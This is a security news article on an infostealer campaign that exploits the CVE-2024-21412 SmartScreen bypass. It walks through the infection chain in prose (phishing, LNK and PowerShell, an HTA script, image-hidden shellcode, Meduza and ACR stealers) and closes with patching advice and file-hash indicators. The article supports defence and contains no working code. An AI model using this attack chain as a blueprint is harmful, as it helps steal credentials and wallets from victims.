Researchers have uncovered an info stealer campaign targeting Microsoft Windows users. This campaign exploits a known vulnerability to bypass security measures and steal sensitive data.
The vulnerability tracked as CVE-2024-21412 is a security bypass in Microsoft Windows SmartScreen. The flaw allows remote attackers to bypass the SmartScreen security warning dialogue and deliver malicious files.
Many attack campaigns, including Lumma Stealer and Meduza Stealer, have exploited this vulnerability in the past.
This campaign’s sequence of attacks.
- Initial Phishing: The campaign begins with a phishing email containing a malicious link. Clicking the link downloads a URL file that, in turn, downloads an LNK file.
- LNK File Execution: The LNK file utilizes PowerShell commands to download an HTA script disguised as an overlay icon.
- HTA Script Decodes Payload: The HTA script retrieves and executes a hidden PowerShell script, which runs silently and downloads a decoy PDF and a malicious shell code injector, injecting the final stealer into legitimate processes.
- Shellcode Injection: Two types of injectors have been identified. The first injector uses an image file to obtain a shell code, with low detection rates on VirusTotal. The second injector downloads a JPG file from the Imghippo website and uses the Windows API “GdipBitmapGetPixel” to access pixels and decode bytes to get the shell code. The other injector is more straightforward, decrypting its code from the data section and using a series of Windows API functions to perform shell code injection.
- Stealer Deployment: The injected code downloads and installs information-stealing malware, such as Meduza Stealer version 2.9 or ACR Stealer.
The ACR Stealer targets various applications, including browsers, crypto wallets, messengers, FTP clients, email clients, VPN services, password managers, and other tools. The stealer can adapt legitimate web services to maintain communications with its C2 server.
The campaign seems to target specific regions, with decoy PDFs tailored to North America, Spain, and Thailand.
It is recommended to install latest security updates to address the CVE-2024-21412 vulnerability are crucial to stay protected.
Users should be cautious of phishing links and downloading unknown files. Email security solutions can detect and block phishing attempts.
This research was documented by researchers from Fortiguard labs.
Indicators of Compromise
- e15b200048fdddaedb24a84e99d6d7b950be020692c02b46902bf5af8fb50949
- 547b6e08b0142b4f8d024bac78eb1ff399198a8d8505ce365b352e181fc4a544
- bd823f525c128149d70f633e524a06a0c5dc1ca14dd56ca7d2a8404e5a573078
- 982338768465b79cc8acd873a1be2793fccbaa4f28933bcdf56b1d8aa6919b47
- bc6933a8fc324b907e6cf3ded3f76adc27a6ad2445b4f5db1723ac3ec86ed10d
- 59d2c2ca389ab1ba1fefa4a06b14ae18a8f5b70644158d5ec4fb7a7eac4c0a08
- 8568226767ac2748eccc7b9832fac33e8aa6bfdc03eafa6a34fb5d81e5992497
- 4043aa37b5ba577dd99f6ca35c644246094f4f579415652895e6750fb9823bd9
- 0604e7f0b4f7790053991c33359ad427c9bf74c62bec3e2d16984956d0fb9c19
- 8c6d355a987bb09307e0af6ac8c3373c1c4cbfbceeeb1159a96a75f19230ede6
- de6960d51247844587a21cc0685276f966747e324eb444e6e975b0791556f34f
- 6c779e427b8d861896eacdeb812f9f388ebd43f587c84a243c7dab9ef65d151c
- 08c75c6a9582d49ea3fe780509b6f0c9371cfcd0be130bc561fae658b055a671
- abc54ff9f6823359071d755b151233c08bc2ed1996148ac61cfb99c7e8392bfe
- 643dde3f461907a94f145b3cd8fe37dbad63aec85a4e5ed759fe843b9214a8d2
